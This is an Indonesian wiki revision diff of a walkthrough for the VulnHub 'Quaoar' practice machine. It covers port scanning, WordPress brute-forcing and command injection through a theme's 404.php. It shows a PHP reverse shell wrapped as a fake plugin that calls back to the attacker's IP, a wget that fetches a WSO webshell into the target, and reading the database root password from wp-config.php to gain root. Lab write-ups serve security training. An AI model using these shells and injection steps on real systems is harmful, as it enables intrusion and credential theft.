Difference between revisions of "CTF Quaoar: Walkthrough"

From OnnoWiki
Jump to navigation Jump to search
 
(28 intermediate revisions by the same user not shown)
Line 2: Line 2:
  
 
* https://www.vulnhub.com/entry/hackfest2016-quaoar,180/#download
 
* https://www.vulnhub.com/entry/hackfest2016-quaoar,180/#download
* Install OVA di VirtalBox
+
* Install OVA di VirtualBox
 
* Jalankan, ada clue di page depan Quaoar saat jalan.
 
* Jalankan, ada clue di page depan Quaoar saat jalan.
 
* Difficulty Level: Very Easy
 
* Difficulty Level: Very Easy
 +
 +
Here are the tools you can research to help you to own this machine. nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra + Your Brain Coffee Google 🙂
 +
 +
Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine
 +
# Get a shell
 +
# Get root access
 +
# There is a post exploitation flag on the box
 +
 +
  
 
==Cek Mesin==
 
==Cek Mesin==
Line 19: Line 28:
 
   -----------------------------------------------------------------------------
 
   -----------------------------------------------------------------------------
 
   .....
 
   .....
   192.168.0.122  08:00:27:b2:18:3a      1      60  PCS Systemtechnik GmbH                                                                                                                                                      
+
   192.168.0.122  08:00:27:b2:18:3a      1      60  PCS Systemtechnik GmbH
   .....
+
   ......
  
 
Scan Quaoar
 
Scan Quaoar
  
 +
sudo su
 
  nmap -v -A 192.168.0.122
 
  nmap -v -A 192.168.0.122
 +
nmap -p1-65535 -A -T4 -sS 192.168.0.122
 +
 
      
 
      
  Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-23 21:23 EST
+
  Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-26 20:28 EST
NSE: Loaded 155 scripts for scanning.
 
NSE: Script Pre-scanning.
 
Initiating NSE at 21:23
 
Completed NSE at 21:23, 0.00s elapsed
 
Initiating NSE at 21:23
 
Completed NSE at 21:23, 0.00s elapsed
 
Initiating NSE at 21:23
 
Completed NSE at 21:23, 0.00s elapsed
 
Initiating ARP Ping Scan at 21:23
 
Scanning 192.168.0.122 [1 port]
 
Completed ARP Ping Scan at 21:23, 0.06s elapsed (1 total hosts)
 
Initiating Parallel DNS resolution of 1 host. at 21:23
 
Completed Parallel DNS resolution of 1 host. at 21:23, 0.00s elapsed
 
Initiating SYN Stealth Scan at 21:23
 
Scanning 192.168.0.122 [1000 ports]
 
Discovered open port 995/tcp on 192.168.0.122
 
Discovered open port 53/tcp on 192.168.0.122
 
Discovered open port 22/tcp on 192.168.0.122
 
Discovered open port 110/tcp on 192.168.0.122
 
Discovered open port 80/tcp on 192.168.0.122
 
Discovered open port 143/tcp on 192.168.0.122
 
Discovered open port 993/tcp on 192.168.0.122
 
Completed SYN Stealth Scan at 21:23, 0.11s elapsed (1000 total ports)
 
Initiating Service scan at 21:23
 
Scanning 7 services on 192.168.0.122
 
Completed Service scan at 21:26, 175.53s elapsed (7 services on 1 host)
 
Initiating OS detection (try #1) against 192.168.0.122
 
NSE: Script scanning 192.168.0.122.
 
Initiating NSE at 21:26
 
Completed NSE at 21:26, 12.15s elapsed
 
Initiating NSE at 21:26
 
Completed NSE at 21:26, 1.11s elapsed
 
Initiating NSE at 21:26
 
Completed NSE at 21:26, 0.00s elapsed
 
 
  Nmap scan report for 192.168.0.122
 
  Nmap scan report for 192.168.0.122
  Host is up (0.00055s latency).
+
  Host is up (0.0011s latency).
  Not shown: 993 closed tcp ports (reset)
+
  Not shown: 65526 closed tcp ports (reset)
  PORT    STATE SERVICE   VERSION
+
  PORT    STATE SERVICE     VERSION
  22/tcp  open  ssh       OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0)
+
  22/tcp  open  ssh         OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol  
 +
2.0)
 
  | ssh-hostkey:  
 
  | ssh-hostkey:  
 
  |  1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
 
  |  1024 d0:0a:61:d5:d0:3a:38:c2:67:c3:c3:42:8f:ae:ab:e5 (DSA)
 
  |  2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
 
  |  2048 bc:e0:3b:ef:97:99:9a:8b:9e:96:cf:02:cd:f1:5e:dc (RSA)
 
  |_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
 
  |_  256 8c:73:46:83:98:8f:0d:f7:f5:c8:e4:58:68:0f:80:75 (ECDSA)
  53/tcp  open  domain     ISC BIND 9.8.1-P1
+
  53/tcp  open  domain     ISC BIND 9.8.1-P1
 
  | dns-nsid:  
 
  | dns-nsid:  
 
  |_  bind.version: 9.8.1-P1
 
  |_  bind.version: 9.8.1-P1
  80/tcp  open  http       Apache httpd 2.2.22 ((Ubuntu))
+
  80/tcp  open  http       Apache httpd 2.2.22 ((Ubuntu))
 +
|_http-server-header: Apache/2.2.22 (Ubuntu)
 +
|_http-title: Site doesn't have a title (text/html).
 
  | http-robots.txt: 1 disallowed entry  
 
  | http-robots.txt: 1 disallowed entry  
 
  |_Hackers
 
  |_Hackers
|_http-title: Site doesn't have a title (text/html).
 
| http-methods:
 
|_  Supported Methods: GET HEAD POST OPTIONS
 
|_http-server-header: Apache/2.2.22 (Ubuntu)
 
 
  110/tcp open  pop3?
 
  110/tcp open  pop3?
  |_pop3-capabilities: RESP-CODES PIPELINING TOP SASL UIDL STLS CAPA
+
  |_pop3-capabilities: RESP-CODES TOP UIDL SASL CAPA STLS PIPELINING
|_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
 
 
  | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
 
  | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
 
| Public Key type: rsa
 
| Public Key bits: 2048
 
| Signature Algorithm: sha1WithRSAEncryption
 
 
  | Not valid before: 2016-10-07T04:32:43
 
  | Not valid before: 2016-10-07T04:32:43
  | Not valid after:  2026-10-07T04:32:43
+
  |_Not valid after:  2026-10-07T04:32:43
  | MD5:   e242 d8cb 6557 1624 38af 0867 05e9 2677
+
  |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
  |_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
+
  139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
  143/tcp open  imap       Dovecot imapd
+
  143/tcp open  imap       Dovecot imapd
 +
|_sslv2: ERROR: Script execution failed (use -d to debug)
 +
|_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
 +
|_imap-capabilities: more STARTTLS ENABLE post-login LITERAL+ listed capabilities
 +
Pre-login have IDLE ID OK LOGINDISABLEDA0001 SASL-IR IMAP4rev1 LOGIN-REFERRALS
 
  | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
 
  | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
 
| Public Key type: rsa
 
| Public Key bits: 2048
 
| Signature Algorithm: sha1WithRSAEncryption
 
 
  | Not valid before: 2016-10-07T04:32:43
 
  | Not valid before: 2016-10-07T04:32:43
  | Not valid after:  2026-10-07T04:32:43
+
  |_Not valid after:  2026-10-07T04:32:43
  | MD5:  e242 d8cb 6557 1624 38af 0867 05e9 2677
+
  445/tcp open netbios-ssn Samba smbd 3.6.3 (workgroup: WORKGROUP)
  |_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
+
  993/tcp open  ssl/imap   Dovecot imapd
|_ssl-date: 2023-01-24T02:26:15+00:00; -1s from scanner time.
+
  |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
  993/tcp open  ssl/imap   Dovecot imapd
 
  |_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
 
 
  | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
 
  | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
 
| Public Key type: rsa
 
| Public Key bits: 2048
 
| Signature Algorithm: sha1WithRSAEncryption
 
 
  | Not valid before: 2016-10-07T04:32:43
 
  | Not valid before: 2016-10-07T04:32:43
  | Not valid after:  2026-10-07T04:32:43
+
  |_Not valid after:  2026-10-07T04:32:43
| MD5:  e242 d8cb 6557 1624 38af 0867 05e9 2677
 
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
 
 
  995/tcp open  ssl/pop3s?
 
  995/tcp open  ssl/pop3s?
  |_ssl-date: 2023-01-24T02:26:15+00:00; 0s from scanner time.
+
  |_ssl-date: 2023-01-27T01:31:44+00:00; +1s from scanner time.
 
  | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
 
  | ssl-cert: Subject: commonName=ubuntu/organizationName=Dovecot mail server
| Issuer: commonName=ubuntu/organizationName=Dovecot mail server
 
| Public Key type: rsa
 
| Public Key bits: 2048
 
| Signature Algorithm: sha1WithRSAEncryption
 
 
  | Not valid before: 2016-10-07T04:32:43
 
  | Not valid before: 2016-10-07T04:32:43
  | Not valid after:  2026-10-07T04:32:43
+
  |_Not valid after:  2026-10-07T04:32:43
| MD5:  e242 d8cb 6557 1624 38af 0867 05e9 2677
 
|_SHA-1: b5d0 537d 0850 11d0 e9c0 fb10 ca07 37c3 af10 9382
 
 
  MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC)
 
  MAC Address: 08:00:27:B2:18:3A (Oracle VirtualBox virtual NIC)
 
  Device type: general purpose
 
  Device type: general purpose
Line 130: Line 88:
 
  OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
 
  OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:3
 
  OS details: Linux 2.6.32 - 3.5
 
  OS details: Linux 2.6.32 - 3.5
Uptime guess: 0.003 days (since Mon Jan 23 21:22:37 2023)
 
 
  Network Distance: 1 hop
 
  Network Distance: 1 hop
TCP Sequence Prediction: Difficulty=261 (Good luck!)
+
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
IP ID Sequence Generation: All zeros
+
  Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel  
+
Host script results:
 +
|_smb2-time: Protocol negotiation failed (SMB2)
 +
|_nbstat: NetBIOS name: QUAOAR, NetBIOS user: <unknown>, NetBIOS MAC: <unknown>
 +
(unknown)
 +
| smb-security-mode:
 +
|  account_used: guest
 +
|  authentication_level: user
 +
|  challenge_response: supported
 +
|_  message_signing: disabled (dangerous, but default)
 +
| smb-os-discovery:
 +
|  OS: Unix (Samba 3.6.3)
 +
|  NetBIOS computer name:
 +
|  Workgroup: WORKGROUP\x00
 +
|_  System time: 2023-01-26T20:31:31-05:00
 +
|_clock-skew: mean: 50m00s, deviation: 2h02m28s, median: 0s
 
   
 
   
 
  TRACEROUTE
 
  TRACEROUTE
 
  HOP RTT    ADDRESS
 
  HOP RTT    ADDRESS
  1  0.55 ms 192.168.0.122
+
  1  1.06 ms 192.168.0.122  
 
   
 
   
NSE: Script Post-scanning.
+
  OS and Service detection performed. Please report any incorrect results at  
Initiating NSE at 21:26
+
https://nmap.org/submit/ .
Completed NSE at 21:26, 0.00s elapsed
+
  Nmap done: 1 IP address (1 host up) scanned in 197.36 seconds
Initiating NSE at 21:26
+
 
Completed NSE at 21:26, 0.00s elapsed
+
 
Initiating NSE at 21:26
+
Service yang di temukan,
Completed NSE at 21:26, 0.00s elapsed
+
 
Read data files from: /usr/bin/../share/nmap
+
Port Service Product
  OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+
22 ssh OpenSSH
  Nmap done: 1 IP address (1 host up) scanned in 191.52 seconds
+
53 domain ISC BIND
            Raw packets sent: 1020 (45.626KB) | Rcvd: 1016 (41.366KB)
+
80 http Apache httpd
 +
110 pop3
 +
139 netbios-ssn Samba smbd
 +
143 imap Dovecot imapd
 +
445 netbios-ssn Samba smbd
 +
993 imap Dovecot imapd
 +
995 pop3s
 +
 
 +
Beberapa informasi menarik dari berbagai servis
 +
 
 +
ssh OpenSSH 5.9p1 Debian 5ubuntu1 (Ubuntu Linux; protocol 2.0
 +
domain bind.version: 9.8.1-P1
 +
http folder Hackers, robots.txt
 +
pop3 dovecot pop3d supporting SASL TOP PIPELINING UIDL RESP-CODES STLS CAPA
 +
netbios workgroup: WORKGROUP
 +
imap post-login ID OK IMAP4rev1 LITERAL+ listed STARTTLS
  
 
Tampaknya yang mungkin menarik untuk di exploit adalah port web 80.
 
Tampaknya yang mungkin menarik untuk di exploit adalah port web 80.
  
==Pakai dirb==
+
==Berburu Flag 1: Web==
 +
 
 +
===Pakai dirb===
  
 
Lakukan,
 
Lakukan,
  
 
  dirb http://192.168.0.122
 
  dirb http://192.168.0.122
 +
dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w
  
 
Hasilnya
 
Hasilnya
Line 648: Line 637:
 
  DOWNLOADED: 258272 - FOUND: 252
 
  DOWNLOADED: 258272 - FOUND: 252
  
 +
Coba,
  
 +
dirb http://192.168.0.122 /usr/share/dirb/wordlists/big.txt -o dirb_scan.txt -w
 +
 +
Hasilny tidak beda jauh dengan sebelumnya.
 +
 +
Sepertinya ada CMS (Lepton CMS) yang mengintai target ini.
 
Disini bisa dilihat terdapat 3 file/folder penting yaitu
 
Disini bisa dilihat terdapat 3 file/folder penting yaitu
  
Line 675: Line 670:
  
 
Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190.
 
Ada LEPTON CMS, tapi sulit untuk diakses karena menggunakan IP 192.168.0.190.
 +
Tampaknya kita lebih baik focus ke wordpress saja.
  
==Wordpress Scanning==
+
===Wordpress Scanning===
  
 
Scan Wordpress,
 
Scan Wordpress,
Line 784: Line 780:
 
  [+] Elapsed time: 00:00:05
 
  [+] Elapsed time: 00:00:05
  
==Wordpress Bruteforce password==
+
 
 +
 
 +
Yang di temukan,
 +
 
 +
What                 Fact
 +
/readme.html         WordPress version 3.9.14
 +
/wp-content/uploads/ Upload directory has directory listing enabled
 +
 
 +
Di temukan user,
 +
 
 +
Id Login Name
 +
1 admin admin
 +
2 wpuser wpuser
 +
 
 +
===Wordpress Bruteforce password===
  
 
Coba bruteforce,
 
Coba bruteforce,
Line 820: Line 830:
 
  password admin
 
  password admin
  
==Inject cmd vulnerability==
+
===Inject cmd vulnerability===
  
 
Coba login ke
 
Coba login ke
Line 900: Line 910:
 
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
 
  uid=33(www-data) gid=33(www-data) groups=33(www-data)
  
==Upload WSO Shell==
+
===Alternative Inject Fake Plugin===
 +
 
 +
Di Kali Linux
 +
 +
cd ~
 +
cp /usr/share/webshells/php/php-reverse-shell.php ~/shelly.php
 +
 +
Beri plugin wrapper
 +
 
 +
<?php
 +
 
 +
/*
 +
Plugin Name: Shelly
 +
Plugin URI: http://localhost 
 +
Description: Bla Bla Bla 
 +
Author: Pingmoose
 +
Version: 1.0.1 
 +
Author URI: http://localhost 
 +
*/
 +
 
 +
COPY CONTENTS OF shelly.php HERE
 +
 
 +
?>
 +
 
 +
 
 +
Masuk ke shell Kali, cek IP address
 +
 
 +
ifconfig eth0
 +
 
 +
Misalnya, IP address 192.168.0.94
 +
Edit shelly shell ubah,
 +
 
 +
$ip = '127.0.0.1';  // CHANGE THIS
 +
$port = 1234;      // CHANGE THIS
 +
 
 +
Menjadi
 +
 
 +
$ip = '192.168.0.94';  // CHANGE THIS
 +
$port = 4444;      // CHANGE THIS
 +
 
 +
 
 +
Zip,
 +
 
 +
zip shelly-plugin.zip shelly.php
 +
mv shelly-plugin.zip /home/kali
 +
chmod -Rf 777 /home/kali/shelly-plugin.zip
 +
chown kali: /home/kali/shelly-plugin.zip
 +
 
 +
Masuk ke
 +
 
 +
http://192.168.0.122/wordpress/wp-admin/plugins.php
 +
 
 +
Upload, JANGAN di aktifkan
 +
 
 +
===Start netcat listener di Kali===
 +
 
 +
Start 4444 listener
  
Download WSO
+
nc -nvlp 4444
  
cd /home/kali/Downloads/
+
Aktifkan shelly shell
wget https://github.com/mIcHyAmRaNe/wso-webshell/archive/refs/heads/master.zip
 
unzip master.zip
 
mv wso-webshell-master/wso.php .                                                                                                                                                                                                                   
 
mv wso.php wso.txt
 
  
Default setting WSO Shell ini
+
http://192.168.0.122/wordpress/wp-content/plugins/shelly-plugin/shelly.php
  
Password  ghost287            Edit line 7 (md5 hash)
+
Di kali linux CLI akan ada kata2,
Email      test@testmail.com  Edit line 4
 
  
File wso.txt ada di /home/kali/Downloads/
+
nc -nvlp 4444
Jalankan web server di Kali linux
+
listening on [any] 4444 ...
 +
connect to [192.168.0.94] from (UNKNOWN) [192.168.0.122] 48071
 +
Linux Quaoar 3.2.0-23-generic-pae #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012 i686 i686 i386 GNU/Linux
 +
  21:23:43 up  1:10,  0 users,  load average: 0.00, 0.01, 0.07
 +
USER    TTY      FROM              LOGIN@  IDLE  JCPU  PCPU WHAT
 +
uid=33(www-data) gid=33(www-data) groups=33(www-data)
 +
/bin/sh: 0: can't access tty; job control turned off
 +
$
  
python3 -m http.server --bind 0.0.0.0 9000
+
Akses shell yang lebih dalam,
  
Cek IP address kali linux
+
$ whoami
 +
www-data
 +
$ whereis python
 +
python: /usr/bin/python2.7 /usr/bin/python /etc/python2.7 /etc/python /usr/lib/python2.7 /usr/local/lib/python2.7 /usr/include/python2.7 /usr/share/python /usr/share/man/man1/python.1.gz
 +
$ python -c 'import pty; pty.spawn("/bin/bash")'
 +
www-data@Quaoar:/$
  
ifconfig
+
Dapatkan flag yang pertama,
  
Misalnya IP address 192.168.0.62, cek apakah bisa di akses via web alamat
+
www-data@Quaoar:/$ cd /home   
 +
cd /home
 +
www-data@Quaoar:/home$ ls
 +
ls
 +
wpadmin
 +
www-data@Quaoar:/home$ cat wpadmin
 +
cat wpadmin
 +
cat: wpadmin: Is a directory
 +
www-data@Quaoar:/home$ cd wpadmin
 +
cd wpadmin
 +
www-data@Quaoar:/home/wpadmin$ ls
 +
ls
 +
flag.txt
 +
www-data@Quaoar:/home/wpadmin$ cat flag.txt
 +
cat flag.txt
 +
2bafe61f03117ac66a73c3c514de796e
 +
www-data@Quaoar:/home/wpadmin$
  
http://192.168.0.62:9000/
 
http://192.168.0.62:9000/wso.txt
 
  
Upload menggunakan exploit,
 
  
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=wget%20http://192.168.0.62:9000/wso.txt
+
==Berburu Flag 2: Root==
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv%20wso.txt%20wso.php
 
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20-la
 
  
==Coba WSO Shell==
+
Cek,
 +
 +
cd /
 +
find / -perm -4000 -user root 2> /dev/null
 +
 +
Tampaknya tidak ada  yang terlalu menarik.
 +
Cek wp-config.php,
 +
 +
cat /var/www/wordpress/wp-config.php
 +
 +
Hasilnya,
 +
 +
.....
 +
/** The name of the database for WordPress */
 +
define('DB_NAME', 'wordpress');
 +
 +
/** MySQL database username */
 +
define('DB_USER', 'root');
 +
 +
/** MySQL database password */
 +
define('DB_PASSWORD', 'rootpassword!');
 +
 +
/** MySQL hostname */
 +
define('DB_HOST', 'localhost');
 +
 +
/** Database Charset to use in creating database tables. */
 +
define('DB_CHARSET', 'utf8');
 +
 +
/** The Database Collate type. Don't change this if in doubt. */
 +
define('DB_COLLATE', '');
 +
.....
 +
 +
DB_PASSWORD rootpassword! - Keren!
 +
Jajal,
  
Jalankan Remote Shell WSO Shell
+
ww-data@Quaoar:/$ su
 +
su
 +
Password: rootpassword!
 +
root@Quaoar:/#
 +
 +
Masuk :) ..
 +
Root Flag
 +
 +
root@Quaoar:/# cd /root
 +
cd /root
 +
root@Quaoar:~# ls -al
 +
ls -al
 +
total 48
 +
drwx------  6 root root 4096 Nov 30  2016 .
 +
drwxr-xr-x 22 root root 4096 Oct  7  2016 ..
 +
drwx------  2 root root 4096 Oct  7  2016 .aptitude
 +
-rw-------  1 root root  410 Jan 24 04:38 .bash_history
 +
-rw-r--r--  1 root root 3106 Apr 19  2012 .bashrc
 +
drwx------  2 root root 4096 Oct 15  2016 .cache
 +
----------  1 root root  33 Oct 22  2016 flag.txt
 +
-rw-r--r--  1 root root  140 Apr 19  2012 .profile
 +
drwx------  2 root root 4096 Oct 26  2016 .ssh
 +
-rw-------  1 root root 4740 Nov 30  2016 .viminfo
 +
drwxr-xr-x  8 root root 4096 Jan 29  2015 vmware-tools-distrib
 +
root@Quaoar:~# cat flag.txt
 +
cat flag.txt
 +
8e3f9ec016e3598c5eec11fd3d73f6fb
 +
root@Quaoar:~#
  
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=php%20wso.php
+
Flag root adalah
  
Di Kali Linux jalankan,
+
8e3f9ec016e3598c5eec11fd3d73f6fb
  
nc -lvp 31337
+
==Berburu Flag 3: Root==
  
Tampaknya belum bisa jalan WSO shell
+
Cek /etc
 +
Tampaknya /etc/cron.d/php5 menarik,
 +
Lakukan,
  
 +
root@Quaoar:~# cd /etc
 +
cd /etc
 +
root@Quaoar:/etc# ls *cron*
 +
ls *cron*
 +
crontab
 +
 +
cron.d:
 +
php5
 +
 +
cron.daily:
 +
apache2  bsdmainutils  man-db              samba
 +
apport    dpkg          mlocate            standard
 +
apt      libvirt-bin  passwd              tomcat6
 +
aptitude  logrotate    popularity-contest  update-notifier-common
 +
 +
cron.hourly:
 +
 +
cron.monthly:
 +
 +
cron.weekly:
 +
apt-xapian-index  man-db
 +
root@Quaoar:/etc# cat cron.d/php5
 +
cat cron.d/php5
 +
# /etc/cron.d/php5: crontab fragment for php5
 +
#  This purges session files older than X, where X is defined in seconds
 +
#  as the largest value of session.gc_maxlifetime from all your php.ini
 +
#  files, or 24 minutes if not defined.  See /usr/lib/php5/maxlifetime
 +
# Its always a good idea to check for crontab to learn more about the operating
 +
system good job you get 50! - d46795f84148fd338603d0d6a9dbf8de
 +
# Look for and purge old sessions every 30 minutes
 +
09,39 *    * * *    root  [ -x /usr/lib/php5/maxlifetime ] && [ -d
 +
/var/lib/php5 ] && find /var/lib/php5/ -depth -mindepth 1 -maxdepth 1 -type f -cmin +$(/usr/lib/php5/maxlifetime) ! -execdir fuser -s {} 2>/dev/null \; -delete
 +
root@Quaoar:/etc#
  
 +
Flag Root adalah,
  
WSO Shell, silahkan yang mau jalan2
+
d46795f84148fd338603d0d6a9dbf8de
Saatnya connectback shell, tinggal jalankan perintah nc -lvp 31337, dan buka bagian network. Masukkan IP kamu dan jadilah shell seperti ini
 
  
  
Perlu diingat! jangan lupa jalankan 2 perintah ini ketika sudah berhasil connect back
 
  
$ python -c "import pty; pty.spawn('/bin/bash');"
 
$ export TERM=xterm
 
Privilege Escalation (getting common user)
 
Silahkan baca output dari linuxprivchecker.py. Ada hal yang menarik dari versi kernel tersebut
 
  
[+] Kernel
+
==Beberapa Catatan Percobaan Sebelumnya==
    Linux version 3.2.0-23-generic-pae (buildd@palmer) (gcc version 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu4) ) #36-Ubuntu SMP Tue Apr 10 22:19:09 UTC 2012
 
Dan ketika saya ingin kompile dan jalankan exploit, hal yang saya takutkan benar-benar terjadi
 
  
www-data@Quaoar:/var/www/wordpress/wp-content/themes/twentyfourteen$ gcc
+
==Percobaan Privilege Escalation (getting root)==
The program 'gcc' can be found in the following packages:
 
* gcc
 
* pentium-builder
 
Ask your administrator to install one of them
 
Oh my god! Tapi saya tidak menyerah, saya cari di https://www.kernel-exploits.com/kernel/?version=3.2.0 dan menemukan exploit yang cocok. Namun ketika dijalankan
 
  
 +
cara-cara di atas semua tidak berhasil.
 +
Terpaksa menggunakan bruteforce.
  
Padahal sudah chmod +x sebelumnya
+
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=pwd
Hmm, sekarang kita coba baca kembali /etc/passwd dari linuxprivchecker. Terdapat user wpadmin seperti ini
+
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20/var/www/wordpress
 +
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=cat%20/var/www/wordpress/wp-config.php
  
[+] All users
 
    root:x:0:0:root:/root:/bin/bash
 
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 
    bin:x:2:2:bin:/bin:/bin/sh
 
    sys:x:3:3:sys:/dev:/bin/sh
 
    sync:x:4:65534:sync:/bin:/bin/sync
 
    games:x:5:60:games:/usr/games:/bin/sh
 
    man:x:6:12:man:/var/cache/man:/bin/sh
 
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 
    mail:x:8:8:mail:/var/mail:/bin/sh
 
    news:x:9:9:news:/var/spool/news:/bin/sh
 
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 
    proxy:x:13:13:proxy:/bin:/bin/sh
 
    www-data:x:33:33:www-data:/var/www:/bin/sh
 
    backup:x:34:34:backup:/var/backups:/bin/sh
 
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 
    nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 
    syslog:x:101:103::/home/syslog:/bin/false
 
    mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
 
    messagebus:x:103:107::/var/run/dbus:/bin/false
 
    whoopsie:x:105:112::/nonexistent:/bin/false
 
....
 
    wpadmin:x:1001:1001::/home/wpadmin:/bin/sh
 
Pada password admin wordpress tadi, username & password semuanya sama. Apakah ini juga berlaku pada user wpadmin? mengapa kita tidak coba
 
  
  
Loh ternyata berhasil beneran!!! XD XD
 
  
Anyway, saya coba iseng decrypt flag md5 itu dan ternyata tidak ditemukan. Saya coba masukin ke root tapi sepertinya bukan itu passwordnya.
 
  
Privilege Escalation (getting root)
 
 
Karena saya tidak menemukan jalan lain selain bruteforce, namun tentunya pusing juga kalau bruteforce rootnya karena /etc/shadow tidak dapat dibuka.
 
Karena saya tidak menemukan jalan lain selain bruteforce, namun tentunya pusing juga kalau bruteforce rootnya karena /etc/shadow tidak dapat dibuka.
  
Line 1,037: Line 1,178:
  
 
* https://habibiefaried.com/pentest-story-defeating-quaoar-vm-345bea40e111
 
* https://habibiefaried.com/pentest-story-defeating-quaoar-vm-345bea40e111
 +
 +
 +
 +
 +
==Percoban Menggunakan WSO Webshell==
 +
 +
 +
 +
==Upload WSO Shell==
 +
 +
Download WSO
 +
 +
cd /home/kali/Downloads/
 +
wget https://github.com/mIcHyAmRaNe/wso-webshell/archive/refs/heads/master.zip
 +
unzip master.zip
 +
mv wso-webshell-master/wso.php .                                                                                                                                                                                                                   
 +
mv wso.php wso.txt
 +
 +
Default setting WSO Shell ini
 +
 +
Password  ghost287            Edit line 7 (md5 hash)
 +
Email      test@testmail.com  Edit line 4
 +
 +
File wso.txt ada di /home/kali/Downloads/
 +
Jalankan web server di Kali linux
 +
 +
python3 -m http.server --bind 0.0.0.0 9000
 +
 +
Cek IP address kali linux
 +
 +
ifconfig
 +
 +
Misalnya IP address 192.168.0.62, cek apakah bisa di akses via web alamat
 +
 +
http://192.168.0.62:9000/
 +
http://192.168.0.62:9000/wso.txt
 +
 +
Upload menggunakan exploit,
 +
 +
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=wget%20http://192.168.0.62:9000/wso.txt
 +
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=mv%20wso.txt%20wso.php
 +
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=ls%20-la
 +
 +
==Coba WSO Shell==
 +
 +
Jalankan Remote Shell WSO Shell
 +
 +
http://192.168.0.122/wordpress/wp-content/themes/twentyfourteen/404.php?cmd=php%20wso.php
 +
 +
Di Kali Linux jalankan,
 +
 +
nc -lvp 31337
 +
 +
Tampaknya belum bisa jalan WSO shell
 +
 +
 +
 +
WSO Shell, silahkan yang mau jalan2
 +
Saatnya connectback shell, tinggal jalankan perintah nc -lvp 31337, dan buka bagian network. Masukkan IP kamu dan jadilah shell seperti ini
 +
 +
 +
 +
==Referensi==
 +
 +
* https://reedphish.wordpress.com/2017/04/02/hackfest-2016-quaoar-walkthrough/

Latest revision as of 20:53, 21 August 2023

Ambil Quaoar dari Vulnhub

Here are the tools you can research to help you to own this machine. nmap dirb / dirbuster / BurpSmartBuster nikto wpscan hydra + Your Brain Coffee Google 🙂

Goals: This machine is intended to be doable by someone who is interested in learning computer security There are 3 flags on this machine

  1. Get a shell
  2. Get root access
  3. There is a post exploitation flag on the box


Cek Mesin

Gunakan 

netdiscover -r 192.168.0.0/24

Currently scanning: Finished!   |   Screen View: Unique Hosts                                                                                                                                                                   
                                                                                                                                                                                                                                 
 21 Captured ARP Req/Rep packets, from 20 hosts.   Total size: 1260                                                                                                                                                              
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 .....
 192.168.0.122   08:00:27:b2:18:3a      1      60  PCS Systemtechnik GmbH
 ......

Scan Quaoar 

sudo su
nmap -v -A 192.168.0.122
nmap -p1-65535 -A -T4 -sS 192.168.0.122



Starting Nmap 7.92 ( https://nmap.org ) at 2023-01-26 20:28 EST
Nmap scan report for 192.168.0.122
